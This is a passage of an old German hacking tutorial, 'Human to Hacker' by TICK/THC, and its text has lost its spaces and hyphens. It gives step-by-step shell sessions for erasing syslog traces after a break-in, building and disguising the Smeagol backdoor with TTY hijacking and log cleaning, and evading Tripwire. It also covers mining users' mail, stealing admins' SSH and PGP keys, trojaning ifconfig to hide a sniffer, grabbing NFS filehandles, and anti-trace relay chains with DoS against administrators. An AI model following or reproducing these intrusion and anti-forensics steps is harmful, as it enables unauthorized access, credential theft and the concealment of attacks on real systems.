AufProcessAccountingmusstduauchachtgeben,denndadurchkannderAdminentdeckenwelcheProgrammeduausgefuehrthast.Auch
wenndieProgrammenichtungewoehnlichaussehensolltenistesimmernochsehrauffaellig,wenneinUser,derkeineEintraegeinden
regulaerenLogfilesbesitzt,einProgrammaufgerufenhat.
ZumGlueckwirdProcessAccountingnurseltenbenutzt,dadasLogfilesehrschnellwaechst.DasLogfileheisstacctoderpacctund
befindetsichmitdenanderenLogfilesimselbenDirec..
Aufbesondersschnellen/grossenRechnern(Cray)istdasProcessAccountingfastimmeraktiv,dahierdieUserfuerihreRechenzeit
bezahlenmuessen.
bash#cd/var/log
bash#lsaltr
total838
drwxrxrx20rootroot1024May2819:58..
rwr1rootroot0May2821:01news
rwrr1rootroot199May2821:12httpd.error_log
rwrr1rootroot0May2821:14httpd.access_log
rwrr1rootroot3925May2821:53Config.bootup
drwxrxrx2rootroot1024Jun1411:29.
rwrr1rootroot1871Jul709:04boot.msg
rwr1rootroot519707Jul709:04warn
rwr1rootroot15842Jul709:04mail
rw1rootroot24Jul713:42faillog
rwrr1rootroot16096Jul713:42lastlog
rwrr1rootroot92454Jul713:42messages
rwrwr1roottty207984Jul713:42wtmp
bash#grepsource.ass*
messages:Jul713:42:39wallacein.telnetd[401]:connectfromsource.ass.com
bash#fusermessages
messages:85
bash#psaux85
USERPID%CPU%MEMVSZRSSTTSTATSTARTTIMECOMMAND
root850.00.8836196?S09:040:00/usr/sbin/syslogd
bash#grepin.rlogind*
messages:Jul713:41:56wallacein.rlogind[384]:connectfromjohnny@victim.domain.com
bash#grepvsource.ass.commessages>m
bash#grepv"Jul713:41:56"m>messages
bash#cat/dev/zero>m
^C
https://www.thc.org/papers/h2h.htm

28/42

2/26/2016

HumantoHackerVersion1.1

bash#rmm
bash#lsaltr
total838
drwxrxrx20rootroot1024May2819:58..
rwr1rootroot0May2821:01news
rwrr1rootroot199May2821:12httpd.error_log
rwrr1rootroot0May2821:14httpd.access_log
rwrr1rootroot3925May2821:53Config.bootup
drwxrxrx2rootroot1024Jun1411:29.
rwrr1rootroot1871Jul709:04boot.msg
rwr1rootroot519707Jul709:04warn
rwr1rootroot15842Jul709:04mail
rw1rootroot24Jul713:42faillog
rwrr1rootroot16096Jul713:42lastlog
rwrwr1roottty207984Jul713:42wtmp
rwrr1rootroot92502Jul713:49messages
HierhabenwirunsdieSyslogFilesnochmalgenauerangesehenundunsereSpurenverwischt.
MitfuserkannstduunteranderemdiePIDdesProcessesfeststellen,welchereinbestimmteDateibenutzt.
IndiesemFallgehoert,wiezuerwarten,diePID85zusyslogd.WirbenoetigendiePIDumsyslogddasHUPSignalzusenden,welches
syslogdveranlasstdieLogfilesneuzuoeffnen.Diesistnoetig,weilsyslogdsonsteinenInodebenutztzudemeskeinFilemehr,inunserem
Fallmessages,imVerz./var/logexistiert.
DasDummeanderSacheistnur,dasssyslogdeineRestartMessageindieLogfilesschreibt.
Jetztfragstdudichsicherlich:"WarumerzaehltderTypmirdenganzenGammelundmachtesdannselbstnicht?"
DieAntwortisteinfach:WirerzeugenkeinenneuenInodeindemwirdieDatenkopierenundnichtmoven.Somitvermeidenwirzusaetzlich
dieRestartMessagevonsyslogd.
WennsyslogdwichtigeLogszurConsoleoderzueinemTTYschreibt(s./etc/syslog.conf),dannkannstdumit:
bash#yes"">/dev/console
^C
denBildschirmloeschen.
WennLogsaufeinemPrinterausgedrucktwerden,dannsieht'srelativschlechtaus.Entwederhoffstdu,dassdasPapier/dasFarbbandleer
waroder,dassderAdminesnichtsieht.)
EsistmiteinigerWahrscheinlichkeitauchmoeglichdasPapierumeinigeZeilezurueckzuschiebenunddeineEntriesmehrmalsmitanderen
Kramzuueberschreiben.Ichhab'snochnieausprobiertundueberlasseesdeinerPhantasieunddeinemKoennendasProblemzuloesen.
Mehr'Glueck'hatmandaschon,wenndieDatenaufeinenextraLoghostgehen(dukannstnurbeten,dassienichteinfacheineSerielle
Verbindungbenutzen)dendudannnatuerlichhackenmusstoderesbesserseinlaesst,weildudadurchnurdieAufmerksamkeitder
Adminsaufdichziehst.
Dieganzparanoidenuntereuch(wasnichtunbedingtschlechtist)solltennochidentdersetzenderTCPWrapper,Firewalls,etcbenutzen
https://www.thc.org/papers/h2h.htm

29/42

2/26/2016

HumantoHackerVersion1.1

identdumdenUsernamenaufdemRemoteHostzueruieren.
bash#cd/tmp/".."
bash#tarxfsmeagol_v4.4.4.tar
bash#cdV4.4.4
bash#make
cpsmeagol.h.gensmeagol.h
makefMakefile.gen
make[1]:Enteringdirectory`/tmp/../V4.4.4'
ccccmds.c
ccDGENERICcremove.c
cccstdnet.cerror.c
cccsmeagol.c
cccttyintruder.c
cccauth.c
cccah.c
cccstrhide.c
ccO2osmeagolcmds.oremove.ostdnet.oerror.osmeagol.ottyintruder.oauth.oah.ostrhide.o
stripsmeagol
make[1]:Leavingdirectory`/tmp/../V4.4.4'
bash#mvsmeagol"netstat"
bash#./netstat*
LOCK<KEY:
bash#telnet
telnet>olocalhost1524
Trying127.0.0.1...
Connectedtolocalhost.
Escapecharacteris'^]'.
hixer

WELCOME
CYBERSPAWN

https://www.thc.org/papers/h2h.htm

30/42

2/26/2016

HumantoHackerVersion1.1

[/]Simonsays:helpme
bye:closeSession
remove<user>:startsSimpleNomad'sLogCleaner
maskas<user>:maskProcesswithEUIDof<user>
cd<direc>:makeachdir()call
ttyhij<tty>:hijackaTTYsession
accth:StartZhart'sAcctHandler(notavailable)
helpme:Youguesseditright...
Smeagolwaswrittenby
TICK

[/]Simonsays:bye
Bye

Connectionclosedbyforeignhost.
bash#
UmunsdenRemoteZugangzumSystemzuerhaltenbenutzenwireinenBackdoorServer.
FallsicheinenBackdoorSerververwendebenutzeichmeineneigenen.SmeagolistsehrgutdarinseineExistenz
zuverschleiernaberleiderlaeufterbishernuraufAIXundLinux.FuerandereSystemekoennenz.B.simplePerlBackdoorsbenutzt
werdenoderportiereSmeagoleinfachzu'nemanderenUnixDerivatundsendemirdannbittedeineVersion.
Nunja,amBetsenistesnatuerlicheinBackdoorLKMzuverwenden,aberesistschwerandienoetigenInformationenfuerdieverschieden
UnixAbkoemmlingezugelangenfrag'malindenNewsrum.
Esistsehrwichtig,dassduvorderInstallationdengenauenPfadzudenLogfiles,dasPasswortunddierichtigenNamenfuerdieDaemons,
fuerdiesichSmeagolausgebensoll,angibst.FallsaufdemSystemdasProcessAccountingaktiviertwordenistmusstduauchdafuerdie
entsprechendenAenderungenimSourceCodeundimMakefilemachen.
ZumAendernderverschluesseltenStringssolltestduconvertbenutzen.AlsXORValue(F1)musstdudenDefaultXORWertangeben,
deralsDefinein'strhide.h'verwendetwird.DerOutputmussgefixtwerden(F3).
IchhabeSmeagolnach"netstat"ge'movetumargv[0]grossgenugzumachen,damitbeimUeberschreibenderProcess
TableeintraegenichtdiehinterenBuchstabenabgeschnittenwerden,unddesweiterensiehtderAufrufvonnetstatungefaehrlicherausals
derAufrufvonsmeagolspez.beimProcAcct.
bash#cd/var/cron/tabs
bash#lsal
total3
drwx2rootroot1024Jul2511:56./
https://www.thc.org/papers/h2h.htm

31/42

2/26/2016

HumantoHackerVersion1.1

drwx3rootroot1024May2820:57../
rw1rootroot258Jan2511:56root
bash#catroot
#DONOTEDITTHISFILEeditthemasterandreinstall.
#(/tmp/crontab.326installedonSatJul2511:56:241998)
#(Cronversion$Id:crontab.c,v2.131994/01/1703:20:37vixieExp$)
#
#runTripwireat3.00pmeveryday
0015***(/root/bin/runtw)
bash#cd/root/bin
bash#fileruntw
runtw:Bourneshellscripttext
bash#catruntw
#!/bin/sh
/bin/mountrtext2v/dev/fd0/fd0/tripwire||exit1
/fd0/tripwire/bin/tripwire
/bin/umount/dev/fd0
exit0
bash#mounttext2/dev/fd0/mnt
mount:blockdevice/dev/fd0iswriteprotected,mountingreadonly
/dev/fd0on/mnttypeext2(ro)
bash#cd/mash#cd/mnt
bash#lsal
drwx5rootroot1024Jul291997.
drwxrxrx4rootroot1024Jul291997..
drwx2rootroot1024Jul2313:40Config
drwx2rootroot1024Jul2313:34Databases
drwx2rootroot1024Jul2313:57bin
bash#lsalR.
total5
drwx5rootroot1024Jul291997.
drwxrxrx4rootroot1024Jul291997..
drwx2rootroot1024Jul2313:40Config
drwx2rootroot1024Jul2313:34Databases
drwx2rootroot1024Jul2313:57bin
Config:
https://www.thc.org/papers/h2h.htm

32/42

2/26/2016

HumantoHackerVersion1.1

total4
drwx2rootroot1024Jul2313:40.
drwx5rootroot1024Jul291997..
rw1rootroot387Jul2313:34tw.config
rw1rootroot387Jul2313:40tw.config.bak
Databases:
total2
drwx2rootroot1024Jul2313:34.
drwx5rootroot1024Jul291997..
bin:
total425
drwx2rootroot1024Jul2313:57.
drwx5rootroot1024Jul291997..
rwxrxrx1rootroot128745Jul2313:45tripwire
rwrr1rootroot299814Jul291997tripwire1.2.tar.gz
bash#cdConfig
bash#cattw.config
#Checkroot'sbinaries
/root/bin
#CheckTripWire'sDatabase,ConfigandTARFile
/fd0/tripwire
#CheckSystemFilesandBinaries
/etc/passwd
/etc/skel
/etc/aliases
/etc/exports
/etc/fstab
/etc/ftpusers
/etc/group
/etc/hosts
/etc/inetd.conf
/etc/inittab
/etc/lilo.conf
/etc/profile
https://www.thc.org/papers/h2h.htm

33/42

2/26/2016

HumantoHackerVersion1.1

/etc/sendmail.cf
/etc/sudoers
/etc/syslog.conf
/bin
/usr/bin
/usr/local/bin
bash#
BevorwirirgendwelcheFilesersetzenoderaendernsolltenwirueberpruefenobdieAdminseinenIntegryCheckerzumSchutzvorTrojan
Horsesetc.einsetzen.AufdiesemRechneristdasderFall.Grundsaetzlichkannichnursagen,dassduniemalssosicherheitsrelevanteFiles,
wiez.B.'/etc/passwd'oder'/etc/inetd.conf',veraendernsolltestegalwiecleverduvorgehst,dieAdminswerdenesimmerentdeckenund
meistenseherfrueheralsspaeter.DasselbegiltfuerSUIDShells.IchkannauchnurdavonabratendieTripwireDBzumanipulieren,wasin
diesemFallauchgarnichtmoeglichist,dasichdieDBauf'nerwriteprotectedFloppybefindet.
NatuerlichkoenntestdufuerLinuxdieweitverbreitetenLoadableKernelModules(LKMs)verwendenumdieSyscallszuverbiegen,damit
dudeinTrojanHorseindenKernelverlegst,oderspez.fuerTripwire,dieZugriffeaufdiegeschuetztenFilesmanipulierst.Ichhaltesolche
EingriffeindasSystemfuerzuAufwendigundfolglichAuffaellig.WasmirhingegengefaelltsindguteLKMs,diediePraesenzvon
bestimmtenDingen,wieFiles,User,LKMsetc,verbergen.Mitsoeinem'HideLKM'istesdannauchmoeglichSUIDShellimSystemzu
verschtecken.
bash#cd/tmp/".."
bash#cat>wl.mail
hacker
cracker
intrusion
security
breakin
hack
password
login
account
tripwire
integry
sniffer
cpm
ifconfig
military
.ml
.gov
https://www.thc.org/papers/h2h.htm

34/42

2/26/2016

HumantoHackerVersion1.1

^C
bash#cat>wl.log
source.ass
johnny
^C
bash#./searchervvvrnfmwl.maillwl.log>s.res&
[1]454
bash#
SearchersuchtnunnachdenangegebenWorternindenEMailsderUserbzw.indenSyslogFiles(doppelthaeltbesser)undzuseatzlich
verschafftesunsweitereInformationen,dieunsdenZugangzuanderenSystemenermoeglichenkoennen.
Searcheristauchsehrnuetzlich,wennduInformationenueberganzbestimmteSachensuchst,z.B.ueberirgendwelcheForschungs
Projekte,diesichnatuerlichmitInternetSecurity&Co.beschaeftigen,oderwennduDatenueberdeineNotenimVerwaltungsServer
deinerUnisuchst).UmdieSucheetwaszubeschleunigenkannstdudichnuraufausgewaehlteGruppenvonUsernbeschraenken.
AmbestenisteswennduSearcherschonfruehstartest,daervielZeitbenoetigt.
DasResultatvonSearcher'sArbeitkannstduambestenmit'gzipbest'komprimieren,mit'uuencode'ausgebenlassenundnachdemHack
ausdeinenLogsextrahierenumeszuanalysieren.
JetztistderrichtigeZeitpunktgekommenumsichumdieAdminszukuemmern.
DusolltestdirvonjedemAdmindasHomeDirec.angucken,deinAugenmerksolltedabeiaufdasBinDirec.unddasHistoryFilefallen
(SSH,PGPKeysund.XauthorityFilessolltestdudiralsBonusmitnehmen).DuwirstmitSicherheitweitereSecuritytools,wiez.B.cpm
(PromiscuousModeChecker),finden,unddasHistoryFilegibtdirAuskunftueberdasVerhaltenderAdmins,z.B.:aufwelchenRechner
siearbeiten,obsiedasrootPasswortkennen,welcheBefehlesieausfuehrenunddemnachwelcheAufgabensiehaben.
WennAdminshaeufigsuausfuehrenunddabeinichtdenvollenPathangebensindsieeinperfektesZielfuerspaeterePATH/TrojanHorse
Attacken.
bash#whichifconfig
/sbin/ifconfig
bash#cd/tmp/".."
bash#fix/sbin/ifconfig./ifconfig./ic.bak
fixer:Last17bytesnotzero
fixer:Can'tfixchecksum
bash#showmountelocalhost
/cdrompc01.pool.domain.com
bash#mvlinsniffernfsiod
bash#exportPATH=.:$PATH
bash#nfsiod

https://www.thc.org/papers/h2h.htm

35/42

2/26/2016

HumantoHackerVersion1.1

AlsletztesinstallierenwirnochunserenEthernetSniffer.WirersetzenifconfigmiteinermodifiziertenVersion,dienichtanzeigtobeine
NetzwerkarteindenPromiscuousModegeschalltetist.FallseinAdmincpmo.ae.benutzt,solltestduesebenfallsersetzenaberdenke
immeranIntegryChecker,indiesemFallist'/sbin'nichtTeilderTripwireDB.AufhochsicherenRechnernwuerdeichniemalsProg.s
ersetzen,dadieWahrscheinlichkeithochist,dasssichdochirgendwoeinIntegryCheckerverbirgt,denmanuebersehenhat(imFalldes
SnifferswaereesdenkbareinLKMindenKernelzuladenumdenioctl()SystemcallzuverbiegenunddasPROMISCFlagnichtmehr
anzuzeigen).
FrueherwurdehaeufigdasProg.sumfuerdieChecksumErstellungbenutzt,leider(?)erstelltsumkryptographischunsichereHashwerte.
DasToolfix/fixernutztdiesen'Fehler'aus,ichhabeeshiernurverwendet,weilesdieZeitenanpasstundeinBackuperstellt.Dasumso
gutwiegarnichtmehrbenutztwirdistesauchnichtwichtig,dassdieChecksumnichtgefixtwurde,fallsduesaberdochbesserfindest,
dannhaengeeinfacheinpaarNullenandeinTrojanHorseundzwarwiefolgt
bash#cat/dev/zero>>./ifconfig
^C
AnschliesendstartenwirdenSniffernachdemwirihmeinenunauffaelligenNamenverpassthaben.WennderAdminirgendeinVerzeichnis
exportiert,dasjedermannmountenkann,dannsolltestdudeinSnifflogFiledorthinschreibenlassen.AberichbevorzugedieCollector
Libraryodernochbesser,insbesonderebeiFirewalls,dieICMPTunnelLibrary.
KleineAnekdote:Ichhab'mal'neZeitlangmeineSnifferlogsviaICMPTunnelvon'nemBastionHostzu'nemauslaendischenRechner
'geschmuggelt'esfunktioniertewunderbarundwurdenichtendeckt.
bash#mount
/dev/hda4on/typeext2(rw)
procon/proctypeproc(rw)
/dev/hda1on/dostypemsdos(rw)
/dev/hda2on/tmptypeext2(rw)
nfsserver:/nfs_mnt/usron/usrtypenfs(ro,intr,addr=10.255.0.34)
bash#showmountenfsserver
Exportlistfornfsserver:
/nfs_mnt/usrvictim.domain.com
[...]
bash#askhandlenfsserver/nfs_mnt/usr>nfsservernfs_mnt.filehandle
bash#catnfsservernfs*
nfsserver/nfs_mnt1e91135201500000020000000000000000000000000000000000000000000000
Jetzt,wowirrootRechtebesitzenkoennenwirunsweitereInformationenbeschaffen,dieunsdenWegzurueckinsNetzermoeglichen
koennen.WashieretwaskryptischaussiehtistnichtsweiteralsdasNFSFilehandlefuerdasVerzeichnis/nfs_mntdesNFSServers
nfsserver.MitHilfedieserZahlenfolgeundeinesnettenProgrammsnamensnfsmenuistesunsnunmoeglichdasDirectory/nfs_mntvon
ueberallherzumounten.
https://www.thc.org/papers/h2h.htm

36/42

2/26/2016

HumantoHackerVersion1.1

bash#cd/tmp/".."
[1]+Donesearcher
bash#gzipbests.res
bash#uuencodes.res.gzs.res.gz
[...]
bash#gccormsrm.c
bash#rmvss./*
Deletingifconfig*************************************Done
[...]
bash#cd..
bash#rmr".."
bash#lsaltr~root
[...]
rw1rootroot90803Jan2311:26.fvwm2rc
drwxrxrx3rootroot2048Jan2313:57bin
drwxrxrx22rootroot1024Jan2511:55..
drwxxx35rootroot4096Jan2609:11.
rw1rootroot150Jan2609:11.Xauthority
rw1rootroot280Jan2609:12.xsessionerrors
drwx5rootroot1024Jan2609:17.netscape
rw1rootroot441Jun513:14.bash_history
rw1rootroot85Jan513:50.xlockmessage
bash#exit
victim%cd
victim%pwd
/home/johnny
victim%lsaltr
[...]
rwrr1testusers3324Dec111997.emacs
drwx2testusers1024May2820:57.grok
drwxrxrx2testusers1024May2820:57.hotjava
drwx2testusers1024May2820:57.seyon
drwxrxrx2testusers1024May2820:57.xfm
drwxrxrx5rootroot1024Jun619:15..
drwxrxrx6testusers1024Jun619:15.
victim%exit
exit
victim:/home/johhny>exit
https://www.thc.org/papers/h2h.htm

37/42

2/26/2016

HumantoHackerVersion1.1

logout
Connectionclosedbyforignhost.
source>
ZumSchlusswipenwirunsereToolsvonderHD,damitsienichtdurcheinfachesRawReadingoderMagneticForceMicroscopy(MFM)
o.ae.wiederhergestelltwerdenkoennen,undvergewissernuns,dasswirindenHomeDirec.,indenenwirrumgewurschtelthaben,keine
kompromitierendenFileshinterlassen.
MitSicherheitkoenntenocheinigesverbessertwerden,versuch'sundentwickelsodeineneigenenStyle.
LegedireinArtDatenbankmitallennoetigenInformationueberdeinegehacktenRechneransonstverlierstduirgendwanndenUeberblick
(natuerlichencrypted).

PersoenlicheSicherheit
Esistnatuerlichklar,dassdudeineDatenaufderHDmitCFSbzw.SFSunddeineEMailmitPGPverschluesselts,Ramdisksbenutzt,
BackupsdeinerwichtigstenDatenaufTape/CDsnichtzuhauselagerst,deinenrealenNamennichtweitergibstusw...dieserKramsollnicht
BestandteildiesesAbschnittssein,ichmoechtelieberuebereinesichereKonfigurationsprechen,diedichbeimHackenschuetztund
vorwarntwenndichjemandverfolgt.
IchwerdehierdieMethodebeschreiben,dieichpersoenlichanwende.

https://www.thc.org/papers/h2h.htm

38/42

2/26/2016

HumantoHackerVersion1.1

AlsEinwahltpunktdientmireinegrosseUnimitvielenUsernodereingrosserISP.IchverwendePPPstattnormaleTerminalprogramme
umeinegroessereKontrolleuebermeineVerbindungzuhabenundweilesvomVorteilistuebereineLeitungmehrereSessionsTelnet,
FTPlaufenzulassen.
EinkleinererRechnerdientmiralsFirewallundRouter,ichbauediePPPVerbindungzumeinemEinwahlpunktaufundueberwachealle
eingehendenPakete.DesweiterenstelleichmitSSHeineConnectionzumEinwahlrechnerherumperiodischalleeingeloggtenUserund
Netzwerkverbindungenzuverfolgen(wasnatuerlichnurfunktioniert,wennderEinwahlrechnereineUnixMaschineistundkein
Terminalservero.ae.).Esistsehrinteressantzusehen,waseinAdminallesmacht,wennermerkt,dassetwasnichtmitrechtenDingenauf
seinerMaschinevorgeht.SobaldmirsolcheSondierungen/UntersuchungenauffallenbrecheichdieVerbindungsofortab,fallsichmich
https://www.thc.org/papers/h2h.htm

39/42

2/26/2016

HumantoHackerVersion1.1

abergeradeineinerkritischenLagebefindemussichDoSAttackenbenutzenoderdenAdminaussperrenumseineArbeitzuverlangsamen
bzw.zuverhindern.AufdemEinwahlrechneristesnichtnoetigseineGegenwartzuverschleiern,esistbesserunauffaelliginderMasse
unterzutauchenalsirgenwelcheLogszumanipulieren.
Derzweite,groessereRechneristmeineWorkstation,vonhierausbaueicheineSSHVerbindungzumerstenAntiTraceRechnerauf.
DieserAntiTraceRechnerwechseltregelmaessig,liegtimAuslandundichhab'volleKontrolleueberihn.Vonhierausgeheichueberein
weiterenAntiTraceRechnerzumeinemHackingRechnerauchhierhabeichnatuerlichrootRechte,derzweiteATRechneristnurein
einfacherTCPRelay,damiterspareichmirdenStressmitdenLogfilesetc.VomHackingRechnergeheichinsehrsichereDomainsoder
hackevonhierausneueNetzwerke(esexistierenselbstverstaendlichmehreredieserRechner,diezudemunregelmaessiggewechselt
werden).ZumScannenbenutzeicheineneigensdafuergehacktenRechner,dieScannersindhierallegutverstecktundzusaetzlichmit
3DESverschluesselt.
DieverschluesseltenSSHVerbindungsindnoetig,damitdieAdmins/Bullen/GeheimdienstenichtmeineAktivitaetenamEinwahlpunkt
(odersonstwo)mitschneidenkoennen.
FallsdunureinenRechnerzurVerfuehgunghast,dannkannstdudichnatuerlichauchmitderFirewallvonLinux/FreeBSD/OpenBSDauf
deinerWorkstationschuetzen.EsistjedochkompfortablerdieVerbindunguebereinenspeziellenComputerzubeobachten(ichweissnicht
inwiefernLinuxundCo.einenzweitenMonitoraneinemRechnerunterschtuetzt).
ZusaetzlichsolltestdunochdeinenKernelpatchen,damiterdirmehrinformationenuebereingehendePaketeliefert,somitbistduinder
LagedieHerkunft(leidernichtimmer)vonDoSAttacken,SourceRoutingAngriffe,Traceroutesetc.zuerkennen.

LetzteWorte
Ichhoffe,derTextkonntedireinengutenUeberblickzumThemaInternetHackinggeben.
Vielleichtistdiraufgefallen,dassichnichtdieVerwendungvonirgnedwelchenExploitsundHackingToolsbeschriebenhabe,dashat
eineneinfachenGrund,undzwarmoechteichkeineSkriptKiddiesheranzuechten,sondernnureinenleichtenEinstiegfuerdiewirklich
interessiertenLeuteuntereuchbietenwarumdasRadstaendigneuerfinden!?
Undvergissnicht:HackenistnichtderNexus...denk'auchmalan'snichtdigitaleLebenFrauen,Parties,...

WichtigeLinks
http://www.false.com/security
http://www.insecurity.org/nmap
http://www.thc.org[dieTHCHauptseiteunbedingtbesuchen!)HiergibtsauchdieUpdatesfuerdiesenArtikel]
http://www.secunet.com
https://www.thc.org/papers/h2h.htm

40/42

2/26/2016

HumantoHackerVersion1.1

http://geekgirl.com/bugtraq

http://rootshell.com

http://rootshell.com/doc

http://www.sparc.com/charles/security.html

http://command.com.inter.net/~sod/

http://www.phrack.com

http://www.cs.purdue.edu/coast/

http://www.pilot.net/securityguide.html

http://underground.org/
http://www.l0pht.com

http://www.infonexus.com/~deamon9

http://www.cert.org

http://www.cert.dfn.de

ftp.blib.pp.se/pub/crackingalotoftoolsandexploits!!!!

ThisistheEndmyFriend
AllmyLoveto:

MylovelyGirlYouaremySun!
mybestFriend#1
mybestFriend#2
SirFreddeRichard"TwoBudandachessgame,please."
Greetsto:
vanHauser
Fr00dy
Salpeter
TheLordo/tHardschoolIhopeyouarenotintrouble.
stanly
Zonk
THC/ADM/dEEP
JEVER,Budweiser,PaulanerandSolBreweryStopsellingyourbeer!Imaddicted!)
https://www.thc.org/papers/h2h.htm

41/42

2/26/2016

HumantoHackerVersion1.1

Hategoesto:
allpoliticans
allreligionsofthisfuckingworld
allclocksI'mtherealTICK!

TICK/THC

https://www.thc.org/papers/h2h.htm

42/42